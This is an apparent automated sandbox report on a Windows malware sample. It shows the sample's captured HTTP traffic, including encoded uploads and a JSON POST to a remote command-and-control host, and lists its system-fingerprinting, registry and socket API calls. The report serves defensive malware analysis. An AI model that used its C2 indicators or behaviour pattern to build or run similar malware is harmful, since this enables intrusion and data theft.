                                                Data Ascii: QHlp\/Gkaf8ALXuJ+lU2X5v9j\/pp+4t\/+3Tt1\/8Ar1c2\/u\/n\/OT+f5\/yx1FQ7Y\/n\/j8v973NB2U+vyKxY7dn1\/z+HH+TTJW\/d73\/AO\/n+enOP8Km\/wBZ\/H\/2z\/8Arfy\/lTGG6R32R4\/z+HPP\/wCug0K23dHyfL7RReb\/AMvH4\/079qhb5FR3TKdfM8r8f\/1VaQ7f3f8A0y83zOf8\/wCelI3+s\/
                                                Dec 23, 2024 17:15:30.273411036 CET2472OUTData Raw: 6b 71 58 38 59 57 44 5c 2f 41 48 66 5c 2f 41 45 4c 5c 2f 41 42 70 74 57 4b 5a 6c 5c 2f 51 66 35 5c 2f 47 76 39 33 54 5c 2f 6d 74 39 70 35 66 6a 5c 2f 77 43 4c 5a 5c 2f 73 5c 2f 38 41 6a 76 38 41 39 61 69 70 76 6e 5c 2f 32 66 31 71 47 73 5c 2f 61
                                                Data Ascii: kqX8YWD\/AHf\/AEL\/ABptWKZl\/Qf5\/Gv93T\/mt9p5fj\/wCLZ\/s\/8Ajv8A9aipvn\/2f1qGs\/aeX4\/8A0PFvjr\/AMijp3\/Yx2n\/AKbNXr6K\/Yo\/bI+Dv7GXwX\/aF8S+GfDfxB1X9tT4l+Gbr4dfCrxsNH8Mw\/Dv4T+ENVaxTVtesdfl8VyeJ28YzyPcaxHHH4Klsvtvhvwzpn2+PT9Q12Y8Lrnh\/SPElmu
                                                Dec 23, 2024 17:15:30.273477077 CET2472OUTData Raw: 76 6c 66 48 5c 2f 58 58 5c 2f 50 66 70 6b 31 5a 6b 6a 2b 35 5c 2f 6e 72 5c 2f 55 6e 33 36 56 57 53 50 45 65 39 5c 2f 6e 35 5c 2f 7a 5c 2f 41 50 57 6f 4f 69 6e 31 2b 58 36 6b 50 6d 64 66 34 5c 2f 30 7a 37 55 78 56 6a 5a 6b 6b 66 5c 2f 50 2b 6a 66
                                                Data Ascii: vlfH\/XX\/Pfpk1Zkj+5\/nr\/Un36VWSPEe9\/n5\/z\/APWoOin1+X6kPmdf4\/0z7UxVjZkkf\/P+jf8A1qm2\/wAD4\/nx\/wDWz+X41D\/t\/wDLP\/6\/59OPrx1oOwh+8vz+nSPn\/Pt+PFQt\/c2\/TP8AP\/J+verkifKnyf8AfvP9PT6\/\/XhjCfO\/8f8Ay1\/z\/n9aCqXT\/D\/kQ+X\/ANMaik\/Pjzf9b1q
                                                Dec 23, 2024 17:15:30.273542881 CET4944OUTData Raw: 5c 2f 4d 6a 70 44 67 66 36 71 58 7a 50 38 5c 2f 6c 57 6e 74 50 4c 38 66 38 41 67 41 51 78 5c 2f 76 4a 50 4c 32 52 7a 4a 48 39 6f 6c 38 30 5c 2f 75 50 4f 37 5c 2f 77 43 4f 61 66 4a 6e 39 33 76 2b 35 5c 2f 6e 5c 2f 41 45 57 37 71 58 63 6e 33 4e 67
                                                Data Ascii: \/MjpDgf6qXzP8\/lWntPL8f8AgAQx\/vJPL2RzJH9ol80\/uPO7\/wCOafJn93v+5\/n\/AEW7qXcn3Ngx5v8Ay7xeR\/nNQxyPj+4kf+q\/fXX\/AIC\/rk0fH5W+e\/3djSn1+X6hJ+82b32eZFb+b+5\/T\/Hvx+NDSOmE\/j\/1Qk83z\/8APT8KfJ\/rE8n\/AJ5W8v2jzcfr\/wDXqGTZ8zunk\/vfK\/ef57\/XPFZm
                                                Dec 23, 2024 17:15:30.393378973 CET7416OUTData Raw: 6f 65 69 36 6f 66 68 77 64 62 76 38 41 52 5c 2f 44 41 31 7a 55 37 66 53 74 54 54 78 4c 72 57 6e 36 50 63 61 48 42 64 4c 66 72 59 74 31 42 76 44 47 68 2b 46 6f 39 65 38 57 5c 2f 46 33 34 4c 5c 2f 44 33 78 42 71 76 67 54 58 50 69 5a 34 4f 2b 47 50
                                                Data Ascii: oei6ofhwdbv8AR\/DA1zU7fStTTxLrWn6PcaHBdLfrYt1BvDGh+Fo9e8W\/F34L\/D3xBqvgTXPiZ4O+GPj3xF4\/sPiH428DaVpmoalpGv6evhb4W+MfAfhOHx3\/AGTqFt8PLP4o+Pfh\/qfjDbpuq6TZS+HPEXhnXNZ\/Jq3gL9FXD4etiameZlyUMzlktWnSz7MK+Lhm1PBPMa2X\/UaGAqY14rD4GFXF4qlHDuWFoUMRPE
                                                Dec 23, 2024 17:15:30.393416882 CET4944OUTData Raw: 76 34 6e 53 38 53 70 5a 4e 67 73 71 78 4d 38 62 77 5c 2f 6a 71 6d 58 59 4e 7a 39 68 57 78 47 52 59 58 4c 38 50 4c 45 31 71 6b 33 4b 64 54 46 35 6e 50 41 66 58 4d 77 72 76 57 76 6a 4d 52 69 4b 5c 2f 4c 48 32 6e 4b 76 6e 62 34 6a 5c 2f 46 75 7a 2b
                                                Data Ascii: v4nS8SpZNgsqxM8bw\/jqmXYNz9hWxGRYXL8PLE1qk3KdTF5nPAfXMwrvWvjMRiK\/LH2nKvnb4j\/Fuz+If7a7fGn4feCvhT8G\/wBlbTP+CpnwO\/ay+KPxJ+Hvhz46zfEP9o\/w78JvH09xoPxG+LWmfFHxh8QfFdvJ4J8L6l411nQfh18KPAvwu8M\/214r1u+b4fX2tNov9nfF\/wAK9Rl8M\/8ABPz4mfCTxLdeLLn9pC
                                                Dec 23, 2024 17:15:30.393476009 CET2472OUTData Raw: 38 41 36 39 52 30 47 6e 74 50 4c 38 66 2b 41 56 36 61 79 37 75 65 39 54 76 30 5c 2f 48 2b 68 71 4c 5c 2f 66 5c 2f 48 2b 6e 58 38 4b 44 51 68 32 4e 36 66 79 5c 2f 78 71 48 70 76 5c 2f 44 70 37 35 78 5c 2f 4f 72 6c 56 70 46 5c 2f 68 5c 2f 6e 6b 64
                                                Data Ascii: 8A69R0GntPL8f+AV6ay7ue9Tv0\/H+hqL\/f\/H+nX8KDQh2N6fy\/xqHpv\/Dp75x\/OrlVpF\/h\/nkduf50HQQUVJJH8v38n8\/\/ANX9fpmmN8uc0GlPr8v1GMu7HbFQt8uc9vSrFNZd2O2KDQhopxUrznv+NNoOgYy55HWq3l+\/6f8A16sSdvx\/pUdbey8pf18gK9Qv94\/h\/IVaZe4\/H\/GoX+6fw\/mKPZeUvu\/
                                                Dec 23, 2024 17:15:30.437190056 CET27192OUTData Raw: 4c 49 69 49 76 7a 6a 5c 2f 56 66 54 5c 2f 50 30 36 31 5a 62 43 5c 2f 66 66 59 6b 6e 37 32 4c 79 5c 2f 39 66 37 59 50 6f 66 38 34 37 77 74 47 5c 2f 33 33 54 65 6c 76 5c 2f 77 41 2b 5c 2f 54 37 52 5c 2f 77 44 72 78 2b 56 5a 6d 68 57 5c 2f 31 75 39
                                                Data Ascii: LIiIvzj\/VfT\/P061ZbC\/ffYkn72Ly\/9f7YPof847wtG\/33Telv\/wA+\/T7R\/wDrx+VZmhW\/1u99\/wDrP+efT2\/P1HOBU0e\/59jyfvIvN5\/f\/p\/+v06UP5x+4n\/LLzcf6n\/Oen86PMfa+xPJf\/pnL0\/w+vf61t7\/APd\/E0p9fkVo9+5\/kynm+UJPN\/f57dvTGe9Ef8WXk3\/60x\/l\/jgcD0p\/yf
                                                Dec 23, 2024 17:15:30.557082891 CET8652OUTData Raw: 31 76 51 4c 69 53 38 30 4c 57 4e 55 30 57 37 6c 67 61 31 6c 75 74 4a 31 43 37 30 32 34 6c 74 6e 6b 69 6c 65 32 6b 6e 73 35 6f 5a 58 67 65 57 43 47 56 6f 57 59 78 74 4a 44 45 35 55 74 47 68 48 35 64 34 6c 38 4a 34 6a 6a 72 67 50 69 66 68 44 43 59
                                                Data Ascii: 1vQLiS80LWNU0W7lga1lutJ1C7024ltnkile2kns5oZXgeWCGVoWYxtJDE5UtGhH5d4l8J4jjrgPifhDCYuhgMTn+WTwFHGYmnUq0MPOdSlNVKtOl+8lFKm01HXU\/zV8G+O8J4ZeKHBXH2PwGJzPB8LZzSzTEYDCVKVHE4qnTo1qbpUalZOlCbdVNOa5dGmfo7+xT\/wTw+OX7QHxW8Tfte\/tL+OfFnhn48fCr9rjwfeXXg\/
                                                Dec 23, 2024 17:16:02.379251003 CET194INHTTP/1.0 504 Gateway Time-out
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.849712185.121.15.192802664C:\Users\user\Desktop\B43WRnzSPD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 23, 2024 17:16:03.256463051 CET272OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                Host: home.twentytk20ht.top
                                                Accept: */*
                                                Content-Type: application/json
                                                Content-Length: 128
                                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
                                                Dec 23, 2024 17:16:12.926074028 CET309INHTTP/1.1 502 Bad Gateway
                                                Server: nginx/1.22.1
                                                Date: Mon, 23 Dec 2024 16:16:12 GMT
                                                Content-Type: text/html
                                                Content-Length: 157
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.84970598.85.100.804432664C:\Users\user\Desktop\B43WRnzSPD.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 16:15:27 UTC52OUTGET /ip HTTP/1.1
                                                Host: httpbin.org
                                                Accept: */*
                                                2024-12-23 16:15:28 UTC224INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 16:15:28 GMT
                                                Content-Type: application/json
                                                Content-Length: 31
                                                Connection: close
                                                Server: gunicorn/19.9.0
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: true
                                                2024-12-23 16:15:28 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                Data Ascii: { "origin": "8.46.123.189"}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                System Behavior

                                                General

                                                Target ID:1
                                                Start time:11:15:22
                                                Start date:23/12/2024
                                                Path:C:\Users\user\Desktop\B43WRnzSPD.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\B43WRnzSPD.exe"
                                                Imagebase:0x600000
                                                File size:4'441'600 bytes
                                                MD5 hash:76E5A31451EEFE694A963AE5B65ECFF2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:2.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:21.9%
                                                  Total number of Nodes:215
                                                  Total number of Limit Nodes:31
                                                  execution_graph 56119 61d5e0 56120 61d652 WSAStartup 56119->56120 56121 61d5f0 56119->56121 56120->56121 56204 63b400 56205 63b425 56204->56205 56206 63b40b 56204->56206 56209 607770 56206->56209 56207 63b421 56210 607790 56209->56210 56211 6077b6 recv 56209->56211 56210->56211 56212 607799 56210->56212 56211->56212 56212->56207 56213 63e400 56214 63e412 56213->56214 56216 63e459 56213->56216 56217 6368b0 closesocket 56214->56217 56217->56216 56218 63b3c0 56219 63b3cb 56218->56219 56220 63b3ee 56218->56220 56224 6076a0 56219->56224 56228 639290 56219->56228 56221 63b3ea 56225 6076c0 56224->56225 56226 6076e6 send 56224->56226 56225->56226 56227 6076c9 56225->56227 56226->56227 56227->56221 56229 6076a0 send 56228->56229 56231 6392e5 56229->56231 56230 639392 56230->56221 56231->56230 56232 639335 WSAIoctl 56231->56232 56232->56230 56233 639366 56232->56233 56233->56230 56234 639371 setsockopt 56233->56234 56234->56230 56122 6b4720 56126 6b4728 56122->56126 56123 6b4733 56125 6b4774 56126->56123 56131 6b476c 56126->56131 56132 6b9270 56126->56132 56128 6b4860 56135 6b4950 56128->56135 56130 6b4878 56131->56130 56139 6b30a0 closesocket 56131->56139 56140 6ba440 56132->56140 56134 6b9297 56134->56128 56138 6b4966 56135->56138 56136 6b4aa0 gethostname 56137 6b49c5 56136->56137 56136->56138 56137->56131 56138->56136 56138->56137 56139->56125 56166 6ba46b 56140->56166 56141 6baa03 RegOpenKeyExA 56142 6bab70 RegOpenKeyExA 56141->56142 56143 6baa27 RegQueryValueExA 56141->56143 56144 6bac34 RegOpenKeyExA 56142->56144 56163 6bab90 56142->56163 56145 6baacc RegQueryValueExA 56143->56145 56146 6baa71 56143->56146 56147 6bacf8 RegOpenKeyExA 56144->56147 56165 6bac54 56144->56165 56148 6bab0e 56145->56148 56149 6bab66 RegCloseKey 56145->56149 56146->56145 56151 6baa85 RegQueryValueExA 56146->56151 56150 6bad56 RegEnumKeyExA 56147->56150 56153 6bad14 56147->56153 56148->56149 56156 6bab1e RegQueryValueExA 56148->56156 56149->56142 56152 6bad9b 56150->56152 56150->56153 56155 6baab3 56151->56155 56154 6bae16 RegOpenKeyExA 56152->56154 56153->56134 56157 6baddf RegEnumKeyExA 56154->56157 56158 6bae34 RegQueryValueExA 56154->56158 56155->56145 56159 6bab4c 56156->56159 56157->56153 56157->56154 56160 6baf43 RegQueryValueExA 56158->56160 56167 6badaa 56158->56167 56159->56149 56161 6bb052 RegQueryValueExA 56160->56161 56160->56167 56162 6badc7 RegCloseKey 56161->56162 56161->56167 56162->56157 56163->56144 56164 6bafa0 RegQueryValueExA 56164->56167 56165->56147 56166->56141 56166->56153 56167->56160 56167->56161 56167->56162 56167->56164 56168 6b70a0 56171 6b70ae 56168->56171 56170 6b71a7 56171->56170 56172 6b717f 56171->56172 56175 6ca8c0 56171->56175 56179 6b71c0 socket ioctlsocket connect getsockname 56171->56179 56172->56170 56180 6c9320 closesocket 56172->56180 56176 6ca8e6 56175->56176 56177 6ca903 recvfrom 56175->56177 56176->56177 56178 6ca8ed 56176->56178 56177->56178 56178->56171 56179->56171 56180->56170 56181 6ca920 56182 6ca944 56181->56182 56183 6ca94b 56182->56183 56184 6ca977 send 56182->56184 56235 6cb180 56238 6cb2e3 56235->56238 56239 6cb19b 56235->56239 56239->56238 56240 6cb2a9 getsockname 56239->56240 56242 6cb020 closesocket 56239->56242 56243 6caf30 56239->56243 56247 6cb060 56239->56247 56252 6cb020 56240->56252 56242->56239 56244 6caf4c 56243->56244 56245 6caf63 socket 56243->56245 56244->56245 56246 6caf52 56244->56246 56245->56239 56246->56239 56251 6cb080 56247->56251 56248 6cb0b0 connect 56249 6cb0bf WSAGetLastError 56248->56249 56250 6cb0ea 56249->56250 56249->56251 56250->56239 56251->56248 56251->56249 56251->56250 56253 6cb029 56252->56253 56254 6cb052 56252->56254 56255 6cb04b closesocket 56253->56255 56256 6cb03e 56253->56256 56254->56239 56255->56254 56256->56239 56257 6ca080 56260 6c9740 56257->56260 56259 6ca09b 56261 6c9780 56260->56261 56265 6c975d 56260->56265 56262 6c9925 RegOpenKeyExA 56261->56262 56261->56265 56263 6c995a RegQueryValueExA 56262->56263 56262->56265 56264 6c9986 RegCloseKey 56263->56264 56264->56265 56265->56259 56185 6395b0 56186 6395fd 56185->56186 56187 6395c8 56185->56187 56187->56186 56189 63a150 56187->56189 56190 63a15f 56189->56190 56192 63a1d0 56189->56192 56191 63a181 getsockname 56190->56191 56190->56192 56191->56192 56192->56186 56266 638b50 56267 638b6b 56266->56267 56284 638bb5 56266->56284 56268 638bf3 56267->56268 56269 638b8f 56267->56269 56267->56284 56286 63a550 56268->56286 56301 616e40 select 56269->56301 56272 638bfc 56275 638c35 56272->56275 56276 638c1f connect 56272->56276 56283 638cb2 56272->56283 56272->56284 56273 638cd9 SleepEx 56280 638d14 56273->56280 56274 63a150 getsockname 56282 638dff 56274->56282 56278 63a150 getsockname 56275->56278 56276->56275 56285 638ba1 56278->56285 56279 638d43 56281 63a150 getsockname 56279->56281 56280->56279 56280->56283 56281->56284 56282->56284 56302 6078b0 closesocket 56282->56302 56283->56274 56283->56282 56283->56284 56285->56273 56285->56283 56285->56284 56287 63a575 56286->56287 56292 63a597 56287->56292 56304 6075e0 56287->56304 56289 6078b0 closesocket 56291 63a713 56289->56291 56290 63a69b 56290->56289 56290->56291 56291->56272 56292->56290 56293 63a811 setsockopt 56292->56293 56294 63a83b 56292->56294 56293->56294 56294->56290 56300 63abe1 56294->56300 56310 636be0 select closesocket 56294->56310 56296 63af56 56296->56290 56297 63af5d 56296->56297 56297->56291 56298 63a150 getsockname 56297->56298 56298->56291 56300->56290 56309 6667e0 ioctlsocket 56300->56309 56301->56285 56303 6078c5 56302->56303 56303->56284 56305 607607 socket 56304->56305 56307 6075ef 56304->56307 56306 60762b 56305->56306 56306->56292 56307->56305 56308 607643 56307->56308 56308->56292 56309->56296 56310->56300 56311 602f17 56318 602f2c 56311->56318 56312 6031d3 56313 602fb3 RegOpenKeyExA 56313->56318 56314 60315c RegEnumKeyExA 56314->56318 56315 603046 RegOpenKeyExA 56316 603089 RegQueryValueExA 56315->56316 56315->56318 56317 60313b RegCloseKey 56316->56317 56316->56318 56317->56318 56318->56312 56318->56313 56318->56314 56318->56315 56318->56317 56319 6031d7 56322 6031f4 56319->56322 56320 603200 56321 6032dc CloseHandle 56321->56320 56322->56320 56322->56321 56323 98b160 Sleep 56324 60255d 56325 989f70 56324->56325 56326 60256c GetSystemInfo 56325->56326 56327 602589 56326->56327 56328 6025a0 GlobalMemoryStatusEx 56327->56328 56329 6025ec 56328->56329 56330 60263c GetDriveTypeA 56329->56330 56331 602762 56329->56331 56330->56329 56332 602655 GetDiskFreeSpaceExA 56330->56332 56333 6027d6 KiUserCallbackDispatcher 56331->56333 56332->56329 56334 6027f8 56333->56334 56335 6028d9 FindFirstFileW 56334->56335 56336 602906 FindNextFileW 56335->56336 56337 602928 56335->56337 56336->56336 56336->56337 56338 603d5e 56339 603d30 56338->56339 56339->56338 56341 603d90 56339->56341 56342 610ab0 56339->56342 56345 6105b0 56342->56345 56344 610acd 56344->56339 56348 6107c7 56345->56348 56350 6105bd 56345->56350 56346 610707 WSAEventSelect 56346->56348 56346->56350 56347 6107ef 56347->56348 56352 610847 56347->56352 56355 616fa0 56347->56355 56348->56344 56350->56346 56350->56347 56350->56348 56351 6076a0 send 56350->56351 56351->56350 56352->56348 56353 6109e8 WSAEnumNetworkEvents 56352->56353 56354 6109d0 WSAEventSelect 56352->56354 56353->56352 56353->56354 56354->56352 56354->56353 56356 616fd4 56355->56356 56358 616feb 56355->56358 56357 617207 select 56356->56357 56356->56358 56357->56358 56358->56352 56193 6029ff FindFirstFileA 56194 602a31 56193->56194 56195 602a5c RegOpenKeyExA 56194->56195 56196 602a93 56195->56196 56197 602ade CharUpperA 56196->56197 56198 602b0a 56197->56198 56199 602bf9 QueryFullProcessImageNameA 56198->56199 56200 602c3b CloseHandle 56199->56200 56202 602c64 56200->56202 56201 602df1 CloseHandle 56203 602e23 56201->56203 56202->56201

                                                  Executed Functions

                                                  Function 0063F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                  • API String ID: 0-1590685507
                                                  • Opcode ID: b0518293be6a40afe3153eac0d103a7d690bf141e9caf9d1ed711427f2ae3257
                                                  • Instruction ID: 8961b6aad25be0217ecb9d9d8e96cf24fb747bec01d4fce71c968ba93a2132c1
                                                  • Opcode Fuzzy Hash: b0518293be6a40afe3153eac0d103a7d690bf141e9caf9d1ed711427f2ae3257
                                                  • Instruction Fuzzy Hash: 16C29E31A043449FE724CF28C485BAAB7E2BF84714F05866DEC999B362D771E985CBC1
                                                  Function 0060255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSystemInfo.KERNELBASE ref: 00602579
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 006025CC
                                                  • GetDriveTypeA.KERNELBASE ref: 00602647
                                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 0060267E
                                                  • KiUserCallbackDispatcher.NTDLL ref: 006027E2
                                                  • FindFirstFileW.KERNELBASE ref: 006028F8
                                                  • FindNextFileW.KERNELBASE ref: 0060291F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                  • String ID: ;%`$@$`
                                                  • API String ID: 3271271169-619377937
                                                  • Opcode ID: 32edef2b340a2ac69f1c7bfd97bb2f5cf1c38e813313ce1bc3c4a528a4d1fa66
                                                  • Instruction ID: 5441468d2004bd1376987c5a0ec613c102b02b3578396c79b4294996a037f9bb
                                                  • Opcode Fuzzy Hash: 32edef2b340a2ac69f1c7bfd97bb2f5cf1c38e813313ce1bc3c4a528a4d1fa66
                                                  • Instruction Fuzzy Hash: 1DD1A1B5904709DFCB10EF68D585A9EBBF0AF48314F0089ADE898D7354E7349A84CF92
                                                  Function 006029FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1271 6029ff-602a2f FindFirstFileA 1272 602a31-602a36 1271->1272 1273 602a38 1271->1273 1274 602a3d-602a91 call a8ee90 call a8ef20 RegOpenKeyExA 1272->1274 1273->1274 1279 602a93-602a98 1274->1279 1280 602a9a 1274->1280 1281 602a9f-602b0c call a8ee90 call a8ef20 CharUpperA call 988da0 1279->1281 1280->1281 1289 602b15 1281->1289 1290 602b0e-602b13 1281->1290 1291 602b1a-602b92 call a8ee90 call a8ef20 call 988e80 call 988e70 1289->1291 1290->1291 1300 602b94-602ba3 1291->1300 1301 602bcc-602c66 QueryFullProcessImageNameA CloseHandle call 988da0 1291->1301 1304 602bb0-602bc0 call 988e68 1300->1304 1305 602ba5-602bae 1300->1305 1311 602c68-602c6d 1301->1311 1312 602c6f 1301->1312 1308 602bc5-602bca 1304->1308 1305->1301 1308->1300 1308->1301 1313 602c74-602ce9 call a8ee90 call a8ef20 call 988e80 call 988e70 1311->1313 1312->1313 1322 602dcf-602e1c call a8ee90 call a8ef20 CloseHandle 1313->1322 1323 602cef-602d49 call 988bb0 call 988da0 1313->1323 1333 602e23-602e2e 1322->1333 1334 602d99-602dad 1323->1334 1335 602d4b-602d63 call 988da0 1323->1335 1336 602e30-602e35 1333->1336 1337 602e37 1333->1337 1334->1322 1335->1334 1343 602d65-602d7d call 988da0 1335->1343 1339 602e3c-602ed6 call a8ee90 call a8ef20 1336->1339 1337->1339 1352 602ed8-602ee1 1339->1352 1353 602eea 1339->1353 1343->1334 1349 602d7f-602d97 call 988da0 1343->1349 1349->1334 1357 602daf-602dc9 call 988e68 1349->1357 1352->1353 1355 602ee3-602ee8 1352->1355 1356 602eef-602f16 call a8ee90 call a8ef20 1353->1356 1355->1356 1357->1322 1357->1323
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
